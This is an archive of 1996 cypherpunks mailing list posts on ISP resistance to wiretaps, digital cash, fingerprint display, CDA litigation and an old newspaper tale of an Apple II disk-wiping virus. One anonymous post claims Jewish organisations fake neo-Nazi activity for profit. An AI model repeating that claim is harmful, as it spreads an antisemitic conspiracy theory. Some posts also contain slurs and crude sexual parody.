small, and viewing themselves as out of the reach of U.S. jurisdiction.  

With the scope of U.S. jurisdiction for compelled discovery, however, 
I think that most ISP's will find themselves in for significant surprises.

Mr. Bell somehow assumes that smaller ISP's will be less vulnerable.  I 
believe this in error.  Smaller ISP's won't even have the financial 
wherewithall to fight a compelled discovery order properly, much less 
actualy prevail in court where it is firmly estlablished that compelled 
discovery orders will be enforced and enforced with vigor, and that 
judicial review will be a waste of time.

Part of Mr. Bell's error lies in his basic assumptions about the 
political makeup and convictions of the general business community, even 
the small business community.

Mr. Bell, as demonstrated by his belief that small ISP's and other 
service providers will risk freedom, fines, and asset forfeiture, seems to 
think that the rumblings of a grass roots revolution are in the wind.  
Why Mr. Bell thinks this, other than the fact that it seems his personal 
fantasy, is without explanation.

It is worth bearing in mind that subpoenas are not the only tool that 
authorities can use to affect compliance.  In many cases authorities 
simply seize the equipment and hold it for the statuatory period before 
which  they are required to file charges in.  The Ripco BBS in Chicago, 
victim of the Sun Devil raids, is a prime example.  In that case the 
equipment was seized (via sealed warrant which later proved to authorize 
seizure of "computer or other electronic equipment of any nature."  and in 
actuality resulted in the seizure of everything from disks to printers 
to telephones), and held for five years before finally being returned.  
Clearly it was obsolete by this time.  No charges have been filed.

While I'm sure Mr. Bell would sacrifice hardware, freedom, cash, (though 
I'm sure he would insist on representing himself), and time to fight the 
tyrany of the FBI, I don't see every ISP suddenly turning into a Montana 
freemen armed standoff with the authorities, which is what it would 
practically take to resist such warrants and exercise of authority, even 
by preemptive or malicious encryption or disposal of data.

In short, welcome to the real world, Mr. Bell.

> Besides, that phone company had a monopoly, so it wasn't possible for 
> citizens to shop around for a phoneco that was known to make it hard for 
> police.  But that's changing, and that's my point.  Now and in the future, 
> it's going to be harder and harder for the police to get a 
> bend-over-backwards level of cooperation, and in fact phonecos (and 
> especially ISP's) might reasonably want to build up a reputation that they 
> will defend a customer's security in court long before a wiretap is 
> installed.

In practice many ISP's or phone co's will not have the opportunity to 
defend the matter in court without their services and equipment being 
forcibly seized preemptively.

> Imaginative phonecos will find ways to inform the target 
> legally, including naming the target as a non-hostile defendant in a court 
> challenge to that wiretap, and noticing that target since he's now a party 
> to a court action that must be noticed under civil procedure rules.

So the ISP sues their client to notify them of the wiretap?  Or the ISP 
sues the FBI and then draws the client into the suit?  I'm not sure what 
you mean here.  In any event it's a totally meaningless point as ongoing 
investigations could easily be blinded and the ISP or telco charged with 
willful obstruction or conspiracy to destroy material evidence to a 
crime, accessory after the fact in effect.

> In short, there is a drastic difference between blind obeisance and 
> enthusiastic hostility, even if you exclude actions by the ISP or phoneco 
> that would rise to the level of some crime.

What you have described is a crime.  Your "clever" lawsuit isn't going to 
fool any judge, or anyone else.

> It is this difference which 
> will  change the previous ability of the police to get wiretaps 
> done secretly.

Wrong.  See above.

> My point in the first paragraph that I am quoted in above is 
> that many of the challenges that have never been made against wiretap 
> subpoenas, due to a closer-than-arms-length relationship between the phoneco 
> and the government, _will_ be challenged.

This argument relies heavily on the absence of other persuasion to comply 
with wiretaps, which, as I have demonstrated, exist in abundance.  Thus the 
thing falls in upon itself.

> Precedent, to the extent 
> precedent exists,

Significant precedent exists, see my note.

> will be challenged on (among other things) the basis of 
> the fact that this precedent was formulated during an era when essentially 
> all telecommunications was monopolized and regulated, and there is no reason 
> to believe that a previous telecom monopoly would have been diligent at 
> protecting the rights of their captive customers against the interest of the 
> government at that time.

You're claiming that a court is going to distinguish the case where a 
small ISP/telco refuses to comply with a compelled discovery order from a 
case where a large telco typically complies with a discovery on the basis 
that the large company complies only under compulsion or in self interest?

This amounts to "A obeys the law because he wants to.  B doesn't want to 
obey the law, therefore B need not."

The "attorney" who makes this argument will be laughed out of the courtroom.

> I think we need to start challenging all the previously-assumed issues that 
> have been interpretated to benefit the government.  If my ISP has agreed, 
> for instance, to send me daily certifications that he hasn't received any 
> "official" inquiries about my account, and one day he receives such an 
> inquiry and is forced to install some sort of a tap, it is hard for me to 
> imagine what kind of legal precedent would allow (and, even, REQUIRE) him to 
> continue to send false certifications when the alternative, simply failing 
> to send any certifications whatever, is also "legal."

As I have tried to explain to Mr. Bell before, the days of legal 
formalism are over.  Substance over form prevails today.  The substance 
of this transaction is to inform the client that an investigation is 
ongoing.  This is a major no-no, whatever Mr. Bell thinks he knows.

> (and, in fact, may be 
> required under my contract with him, should he be obligated to do a tap or 
> know one exists.)

As I explained before, contracts are void to the extent they are 
illegal.  Mr. Bell's response?  "Well, then we'll kill him and enforce 
the contract that way."

> The fact that I'd likely interpret his failure to send those 
> messages as meaning that my access is tapped is not within his control, and 
> if he's unwilling to screw me I find it hard to believe that he can't act on 
> this fact even if those actions have an indirect effect of alerting me.  

Your use of the word "indirect" is stretching the bounds of the 
imagination.  A judge, unless sleeping through argument, would see 
through this like glass.

> These are the kinds of issues that have either rarely or never been 
> challenged in court, simply because the organization(s) that would normally 
> do those challenges was in the hip pocket of government.  It's going to be a 
> brave new world very soon.

Incorrect.  They have been challenged time and time again in the context 
of compelled discovery.  Time and time again compelled discovery has been 
required, TRO's forbidding the destruction of documents and other 
evidence issued, search warrants and seizure effected in place of subpoena.

The telco in past has not complied with such orders because of some grand 
government conspiracy, although I realized Mr. Bell finds such things 
immensely sexy.  It has complied because its officers faced criminal and 
financial sanctions for non-compliance.

There are ways to resist compelled discovery.  These are not they.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Fri, 5 Apr 1996 16:44:37 +0800
To: cypherpunks@toad.com
Subject: Re: Navajo code-talkers
In-Reply-To: <9604041824.AA1177@smtp1.chipcom.com>
Message-ID: <Pine.HPP.3.91.960405034921.29585A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> English words).  Furthermore the language is several centuries older
> than Homer, so you have to deal with assorted archaisms.  Then again,
> if you know even a little of ancient greek linguistics, it gets easier.

There has been this talk of the Navajos for a couple of weeks.
I know they are an interesting people (oh, how beautiful was Ninibah
Miriam Crawford, the beautiful representative of the Navajo Nation
at the UN Environmental Conference in Stockholm 1972), but what about
the Hopis? At the same conference I met David Monangaye, then the
spiritual leader of the Hopi Nation (now dead), and Thomas Banyacya,
now their spokesperson (and Thomas' daughter Loreena, oh, a true
keeper of the earth).

The Hopi word for Navajo is TASAVUH; literally "He who pounds his
enemy's head with a rock", and for the communal and peace-loving
Hopis the Navajos are an aggressive and ornery people who have
been a headache ever since they invaded Black Mesa, shortly after
the palefaces first appeared on the Hopis' sacred land.

How funny that these head-pounders found a niche in the Pantheon
of American Heroes. But no wonder they are the only Native American
Nation to have more territory now than 100 years ago.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 5 Apr 1996 21:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: More visprint stuff
Message-ID: <960405042910_264590150@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>An alternative would be to supply a distinct name for each octet.  Hashes
>could
>be displayed and verified something like:
>
>Frog		Lizard		Snake		Tyranosaur
>Cat		Hat		Rat		Chair
>Star		Moon		Sun		Earth
>Lincoln		Washington	Clinton		Kennedy
>
>Ideally, there would be minimal confusion in the set of images/objects/names
>(to avoid the "is that a Tyranosaur or a Lizard?" type questions.)

Why not create a list of of syllables (256 would work nicely) designed in
such a way that when combined together at random, they would always form a
pronounceable (but otherwise nonsense) word pair?  These words would be
guaranteed to be as unique as the fingerprint, fairly easy to remember, and a
perfect icebreaker at parties.  (Imagine the reaction you would get if you
sidled up to someone and tried "SOBgoFALpinHOGmiDOwop
PORtudeINfoGLOPsabRIvar" as a pickup line.)  The challenge to this approach,
of course, is to come up with 256 reasonably distinct syllables.

Jonathan Wienke

P.S.  AOL's send mail software is a wothless piece of ****.

P.P.S.  These "unsubrscive" pea-brains all need one of those Louis
Freeh-style leather belts with their names embossed on the back in BIG
letters...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@UNiX.asb.com>
Date: Fri, 5 Apr 1996 21:28:04 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Blue Water spooks
In-Reply-To: <Pine.SUN.3.91.960331184105.18816I-100000@polaris.mindport.net>
Message-ID: <3164F3BE.C5E@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
[..]
> Bottom line:  The Chinese have often extended their intelligence
> operations beyond their borders, even boldly.

I remember after Tiannamen Sq. many protests/meetings help by Chinese 
were semi-secret or they did their best to keep cameras out, or in many 
of the public ones people disquised themselves (from wigs and makeup to 
outright bandanas or bags over their faces) because of fear that the 
Chinese authorities would see them and persecute relatives who were still 
there.

ObCPunk: Anonimity is important not just in the cybernetic aether.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 5 Apr 1996 23:38:22 +0800
To: cypherpunks@toad.com
Subject: Wired didn't like this one....
Message-ID: <v02120d03ad8ab73d36b6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Sender: e$@thumper.vmeng.com
Reply-To: rah@shipwright.com (Robert Hettinga)
Mime-Version: 1.0
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 4 Apr 1996 21:21:19 -0500
Precedence: Bulk
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Wired didn't like this one....

-----BEGIN PGP SIGNED MESSAGE-----

 ...but I like it. Said it was a little too "fast paced". (For WIRED???)

I'm starting over on another, so you guys might as well see this one...

It *was* supposed to go into their Idees Fortes (Or, as my brother Mike in
Albuqerque says, in his best Jose Jimenez, "Stron' Gideas") section. Now
something else is, once I write it. Feh!

It's 800 words. Exactly.

Cheers,
Bob Hettinga



  ------------------------
Geodesic Capital?

Robert Hettinga

I've just finished a bit of anonymous consulting on the net for an
anonymous client, being paid, of course, in anonymous digital ecash(tm). I
could just store it, offsite even, anonymously. But, I'm saving it for that
special retirement habitat in the Belt ("Gerry's Habitats, Inc.: Pie in the
sky, Nano-Built(tm) *before* you die!"). I have to *invest* it somewhere.

I buy a page of mutual fund reccomendations from a LipperBot(tm). In my
case, I just want to buy a broad market index, say, the (ahem) Hettinga
Million(tm), and shop around for the fund server which approximates closest
the HM's price over time. I link to the server, and buy anonymous bearer
certificates for that server's HM fund.  Later, when I cash in my
certificates, I have enough appreciated capital to buy the custom Bernal
sphere of my dreams. Of course, if my tolerence for risk is higher, I could
buy shares from a fund manager (bot or otherwise, no way to tell with
anonymous cash markets) with a hot hand for picking stocks.

OK. Say I don't actually *save* money.  I'm someone who borrows money for
very short term "assets" like resturaunt meals, and pays the incurred debt
off over the long term at some userous interest rate. How do I do this?

I issue a personal digital bearer bond for the amount of the transaction.
All I need is someone to underwrite the risk. Fortunately, I always have an
efficient real-time market to auction it into, one that always knows my
payment reputation, thanks to all those money-bots in the ubiquitous
network. Voila'! Bring on the chateaubriand for one, waiter, and don't
spare the bearnaise, all this thinking about money's made me hungry.


What we're talking about here is nothing new, of course. We've had trade
ever since we've had artifacts. The ancient "red-paint" culture was just a
trading network which ran around the north Atlantic from New England to as
far as Ireland. So much for the "New" World.  The oldest surviving
Babylonian money is a piece of clay saying "three cows" wrapped in a clay
"envelope" saying something like "three cows, payable on demand, so say I,
(signed) Joe Nebbuchenazzar". This happened shortly after writing was
invented, which was actually invented for *accounting*. Mechanical
signatures like chops and seals have been around since. Digital signatures
and bearer certificates are just a new implementation of some *very* old
stuff.

Ornate paper certificates, representing shares in companies, or actual
stuff, was physically traded for other ornate paper certificates (cash), or
actual stuff, at places like the famous buttonwood tree on Wall Street.
Pretty soon people didn't have to be there to trade. We built fast
industrial communications (staged horsemen or coaches, then ships or
trains, then telegraphy, then telephony) but we still had slow switches
(people), so we had to build all the communication/organization/market
hierarchies we know and love today.  In addition, the power of the state
(another industrial communication heirarchy) provides a sizable argumentum
ad bacculum for people who repudiate trades. If you don't pay, I throw you
in jail.

Like every thing else, Moore's law changes that.  Proportionately,
semiconductor switches get more and more cheaper than lines, so the
telephone network is no longer a hierarchy. Nodding to Buckminster Fuller,
Peter Huber called it the "Geodesic Network", the title of the 1986
government report he wrote describing it.  Ironic. I'm here saying this in
a magazine founded by deciples of Stwart Brand, himself a one-time
Fullerite. All threads lead to Bucky.

When you combine a geodesic network with strong cryptography, you get a
geodesic economy, which needs geodesic capital. Just change the size of
players in either equity or debt scenario, and you're looking at what any
large business organization does today. The only thing you're missing is
how to deal with non-repudiation. If the state can't tax transactions or
financial assets because strong crypto makes them all invisible, states
can't exist, much less "bacculize" very well. The solution is the same it
ever was: reputation. J. Pierpont Morgan said, when hauled before Congress
one afternoon, "Character, sir. I wouldn't buy anything from a man with no
character, even if he offered me all the bonds in Christendom." In a
geodesic economy, reputation is abstracted to keys, not people.

Geodesic capital scales up to bigger stuff than we can do now. A chaotic
hoarde of autonomous money-bots swarms on the minutia of the necessary
financial complexity. It also scales *down* as processor prices fall. Real
time, MicroMint(tm) cash-on-the-router-head auctions for packet switching,
anyone?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWR/ovgyLN8bw6ZVAQHCkQP7BPmSNibfRQLeZETvRkUVGJdPB0WOYrTM
yU33wwqDPBEcwfYLgX4oBcAfHv/Kfvr1vH4bBTioEVyanVDtJLt9KL/62kn+Ot+/
BLDdBM6Km1R/xRD9xnvQd5Kyz2INQCmNU7ZJk3BQpK484V74aW6We155fH2ovjr3
TgQ6mYMe7rs=
=GVNA
-----END PGP SIGNATURE-----

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 5 Apr 1996 23:13:15 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <ad89ceca1802100447ee@[205.199.118.202]>
Message-ID: <LNuwLD116w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

> At 11:52 PM 4/4/96, Andr=C8 Gil wrote:
> > unsubscrive * agil.home@mail.telepac.pt
> > unsubscrive * agil.home@mail.telepac.pt
> > unsubscrive * agil.home@mail.telepac.pt
>
>
> What the hell is going on? We seem to be under attack by foreigners.

Maybe they were offended by the politically incorrect discussions on
this list? :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: etoy@hijack.org (THE HIJACK-CREW)
Date: Fri, 5 Apr 1996 18:54:43 +0800
To: cypherpunks@toad.com
Subject: HANDS UP!
Message-ID: <199604050514.HAA01145@www.hijack.org>
MIME-Version: 1.0
Content-Type: text/plain


HI THERE!    THIS IS etoy! 

"the digital hijack" is NOW running !

the internet-underground has decided: it is definitely time to blast SOUND
and ACTION into the net !!! 

our software-agents have invaded the main searchservers...

++++for more information check out : http://www.hijack.org/++++++++++

or get kidnapped live --> go to infoseek (netsearch-button on your browser)
and search for:

UNDERGROUND - CENSORSHIP - DISCO - XTC - CLINTON - PORSCHE -  CRACK -
KRAFTWERK - ELVIS - TERROR - PENTHOUSE - SEGA - MONDRIAN - SEXPISTOLS -
FIREARMS -  TARANTINO  - DJ - STONES - NETWORKS - BASE - CRIME - WAR -
BUSINESS - WOMEN - NET - SOCIETY - ART - CASTRO - PARADISE - ATHLETICS -
PULP - CYBER - YELLO - PETSHOPBOYS - REM - HUSTLER - BITCH - GUEVARA -
SEVESO - MELODYMAKER - PORNO - GABBER - ROLLERBLADES - REBEL - OASIS -
COMMUNICATIONS - PLAYBOY - BELGIUM - ORB - AND MANY MORE...

these keywords will all appear on the TOP 10 - LIST. take the link to
hijack.org to get the hijack-experience like millions of bored
internet-users...

download the hijackers-sound, get the best pictures and help us free our
friend KEVIN D. MITNICK, THE SUPERHACKER (charged for electronic-terrorism,
maximum sentence: 460 years prison) !

we would be very happy to welcome you on our site. spread this new
internet-lifestyle to your friends and to internet-freaks + surfers !

this is a underground art-project not a bastard-business mail. our grab
robot "etoy.IVANA" got your email-address by cruising the net.

for the hijack-crew etoy
MARTIN KUBLI

email  mailme@etoy.com
fax ++41 1 363 35 57
_______________________________________________________________________
http://www.hijack.org/
for highres-pictures: ftp.etoy.com   /press


etoy: 
leaving reality behind...abusing technology...flashing the net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 6 Apr 1996 08:44:02 +0800
To: cypherpunks@toad.com
Subject: Re: Bad news from Judge Richey
Message-ID: <m0u5EKq-0008ypC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 PM 4/4/96 EST, Dr. Dimitri Vulis wrote:
>"E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> writes:
>> 	Umm... one would guess that a federal judge would be against the
>> whole Assasination Politics idea, whether or not he himself became a target.
>
>It's worth noting that one of the new newsgroups that Rich Graves mentioned is:
>talk.politics.assassination             Assassination Politics
>My congratulations to Jim Bell on getting his own newsgroup!

Hey, it's news to me!  I'll have to check it out...   BTW, are you sure it's 
not an old one?  After all, there have been enough assassination conspiracy 
theory discussions (Lincoln, Huey Long, JFK, RFK, King, etc) over the 
decades that I'm sure they'd merit a discussion area.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 6 Apr 1996 10:35:45 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <Pine.SUN.3.91.960404182031.758A-100000@polaris.mindport.net>
Message-ID: <199604051727.JAA02353@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	What's the point here, or is Unicorn just having fun
lambasting Jim Bell?

	My basic attitude, running an internet privacy provider, is if
Mr. Govt. wants my data, and gives me a court order (subpoena,
"compelled discovery", whatever), then I'll give it to 'em.
	If my customers that they were looking for had any brains at
all, a court order, compelled discover, whatever, will not help
Mr. Govt. That's the cornerstone of my security model.

	Or am I confused about what you are talking about here.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 6 Apr 1996 06:32:24 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: A new law in the making?
In-Reply-To: <199604050206.UAA01078@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.960405103144.13105B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Thu,  4 Apr 1996 00:24:08 -0500 (EST)
> > From: "Declan B. McCullagh" <declan+@CMU.EDU>
> > Subject: FC: CDA Court Challenge: Update #4
> > 
> > The court wasn't happy with Boe's response. It gave Shea and the
> > government until April 17 to decide to include the entire record of
> > the Philly lawsuit -- and said that if they don't, the court would
> > appoint its *own* computer expert to demo the Net and blocking
> > software on April 30.
> 
> This is a great idea if carried a little farther. Require courts in cases
> using technical or otherwise special evidence to appoint an indipendant
> expert to compare compare with the defence and prosecution experts.

This is a hard thing to do in U.S. courts just because of the way the 
history and jurisprudence of the U.S. legal system works.  That is, the 
neutral finder of fact does not typically participate in investigations 
of his or her own, but relies on the adverse parties to develop truth 
through the clash of their respective interests before him/her.

Many jurisdictions allow an active judiciary in this regard.  Its nearly 
improper in the U.S.

> 
> > litigators who do their homework." (Of course, Taylor conveniently has
> > deluded himself into believing the CDA is constitutional.)
> 
> Are *any* of the current legal actions involved using either the 9th or 10th
> Amendment in their case?
> 
> > We're back in court on 4/12, 4/15, and possibly 4/26.
> 
> Good luck!
> 
> 
>                                                  Jim Choate
>                                                  CyberTects
>                                                  ravage@ssz.com
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 6 Apr 1996 07:15:12 +0800
To: cypherpunks@toad.com
Subject: RIC_odj
Message-ID: <199604051541.KAA07895@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-5-96. TWP:

   "At the Justice Dept., Big Government Keeps Getting Bigger"

      In the tug-of-war over downsizing the government,
      Republicans and Democrats still willingly take out the
      checkbook when crime is the issue. Over the past 16
      years, a time in which both parties have controlled
      Congress, Justice's budget has grown by nearly 600
      percent and its work force has expanded from about
      55,000 employees to 94,000.

      Justice is only one part of this phenomenal crime-
      fighting growth. Where the federal government once
      relied mostly on the FBI, the federal buildup is
      creating several large police agencies. More than 41,000
      criminal investigators now work for 32 federal agencies.

      "It has grown like Topsy," says former AG Griffin B.
      Bell. "What I worry about is that people with a badge
      many times can't manage power."

      Senior members of Congress with oversight responsibility
      for DoJ say they are considering ways to consolidate
      the government's law enforcement agencies under a more
      centralized command. Among the models under review are
      the JCS, which aerosols DoD hogstench, and the DCI, who
      perfumes spy pew.

   RIC_odj












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Loysen <dwl@hnc.com>
Date: Sat, 6 Apr 1996 11:50:01 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive * Peter.Posch@koeln.netsurf.de
Message-ID: <199604051844.KAA03398@spike.hnc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:33 PM 4/4/96 -0500, you wrote:
>On Thu, 4 Apr 1996, Peter N. Posch wrote:
>
>> unsubscrive * Peter.Posch@koeln.netsurf.de
>
>Why don't we just patch Majordomo to recognize "unsubscrive", 
>"unsuscribe", "unscribe," and "take me off this fucking list" as all being 
>equal to "unsubscribe"?
>
If these people had sent their messages to majordomo that would work.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 6 Apr 1996 08:43:29 +0800
To: kreidl@newrock.com
Subject: Re: Why pay???
In-Reply-To: <199604042142.PAA24182@Ultra1.corenet.net>
Message-ID: <Pine.SUN.3.91.960405111006.4039B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996 kreidl@newrock.com wrote:

> Why would I pay if I can get it for free this way??????

You can also get it free from me.  I also run a filtered cypherpunks 
list, but it's 100% free. :)  To subscribe send a private message to me 
(don't use the reply command as it will fail.) with the subject like 
"fcpunx subscribe" (or "fcpunx help" if you want info first.)

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Wilson <0005514706@mcimail.com>
Date: Sat, 6 Apr 1996 07:56:14 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Was Cohen the first?
Message-ID: <35960405162553/0005514706DC3EM@MCIMAIL.COM>
MIME-Version: 1.0
Content-Type: text/plain


I ran across the following article, and it set me to wondering--did
Dr. Cohen actually publish on 'computer viruses' before anybody else?
He continues to use it as the bedrock of his reputation capital, so if
this pre-dates his 'seminal' article, please let me know.

Included message:
For Liz Bass or Reg Gale
Discovery
9:31 AM Friday, April 5, 1996
By Lou Dolinar

 This is still my favorite computer story.  I'm not saying it was the first
piece ever written about computer viruses, but I won't say that it isn't.  I
still have the original, dated  April 16, 1985.  In some ways I wish I hadn't
written it, because it was posted and reposted on bulltetin boards all over
the U.S., and seems to have subsequently inspired a whole generation of virus
writers. 

 Note to kids: back then, most computers didn't have hard disks, and started
up from floppies, hence floppy based viruses were a big deal.

 As usual, The Hacker wasn't paying for his midnight phone call; he had
stolen the line from one of the long distance phone services.
 What's up? I asked. The 17-year-old snickered. Doom was ahead for all Apple
II owners.  "Don't engage in casual disk-copying with strangers," he said.
 "You might catch an operating-system virus."
 Now the hacker has a pretty hefty national rep in the computer underground,
so when he talks about this crazy stuff, it's worth listening.   I've seen
whole collections of pirated games software bearing his nom de hack, and his
black-bag jobs on mainframes would curl your hair.
 In case you're not familiar with software piracy, manufacturers build
protection schemes into their programs to prevent people from making illegal
copies and siphoning their profits.  Dedicated pirates like my friend spend
hours, sometimes days, cracking these schemes then release them, illegally,
free, to the public over a network of electronic bulletin boards that can be
reached with a phone, a computer and a modem.
 The Hacker always imprinted his name, electronically, on the game that he
cracked ("Cracked by The Hacker, July 4, 1978"). And therein lies this tale.
 A couple of years back, he recalled, some teenagers in the Milwaukee area
stole his stolen programs and released them under their own names.  Why
bother, you ask?  Because the hacker whose name the stolen program bears
receives the "credit" for having cracked the piracy protected program and,
thus, is viewed with some degree of appreciation by similarly larcenous
wizards in the computer underground.
 The Hacker was outraged and plotted a diabolical revenge: A wizard of code,
he constructed ted what he calls an "operating system virus" for the Apple II
computer.  The operating system, you may know, loads into the computer before
the program and controls the functions of the computer.
 The Hacker modified the operating system  erase whatever disks were in the
computer after they had been used 25 times.  Not only that, but the "virus"
would attache itself to any other discs that were loaded during the
particular session of computer use.  Thus,k if you played a "virus" carrying
pirated game, and then went on to use your $495 word processor and $795
data-base program, these too would be infected and would cash after their
25th use--and in the meantime, they would be spreading the "virus."
 Like any disease, then, Killer-DOS, as The Hacker dubbed it, has a latency
period, which allowed it to spread to other "victims" He inserted it into a
recently cracked games program, put it on an electronic bulletin board
frequented by the Minneapolis crowd, and sat back to watch the fun.  A couple
of months later, whole libraries of disks were begin wiped out as the
 "disease" spread.
 Now Killer-DOS is common knowledge in the underground, it it wasn't the
reason The Hacker called.  It seems he had, in a frenzy of anti-social
behavior, created a particularly virulent form of Killer-DOS that didn't
crash until it had been loaded 150 times---with a longer latency period, the
potential number of victims rises geometrically.  But conscience prevailed.
 The Hacker decided not to release the bug.
 Then, however, just like the Andromeda Strain, the bug got loose anyway--the
Killer-DOS disk got mixed in with "healthy" programs, disks that he has been
handing out for the last couple of years and are now all over the country. So
if you find a worm in your Apple, don't say you haven't been warned.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 5 Apr 1996 20:44:08 +0800
To: cypherpunks@toad.com
Subject: Re: Fascinating troll with forged newgroups
Message-ID: <199604050940.LAA01439@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote:

>At 03:00 AM 4/4/96 -0800, you wrote:
>>Looks like the Nazis forged newgroup messages for rec.fag-bashing,
>>rec.org.kkk, and 100 RFD'd groups in order to get their little messages
>>across.
>>
>>How entertaining. What a marvelous new form of net.vandalism they've
>>discovered. Or is this not new?
>
>Oh, no, this sort of thing is not new.  It happened more before the
>Great Renaming, but it's not new.  The other possibility is it's troll
>trying to make it _look_ like the Nazis did it.

The latter is most likely the truth given that Bnai Brith and the ADL
and the Simon Wiesenthal centre all have plenty to gain financially
by claiming that the internet is full of neo-nazis.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Apr 1996 11:15:04 +0800
To: cypherpunks@toad.com
Subject: "Contempt" charges likely to increase
Message-ID: <ad8a9f931d0210045564@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I almost titled this thread "'Contempt' charges likely to increase in
popularity," but I felt the "popularity" would draw comment. By
"popularity" I mean amongst judges and law enforcement.

Many of the proposals here and in related discussions of offshore asset
protection posit the following situations:

* Alice places a copy of her key, or secret-shared parts of her key, in a
location not reachable by subpoena. (This might be via strong crypto, a la
mixes and pools, or just in a jurisdiction which historically and typically
does not honor U.S. subpoenas.)

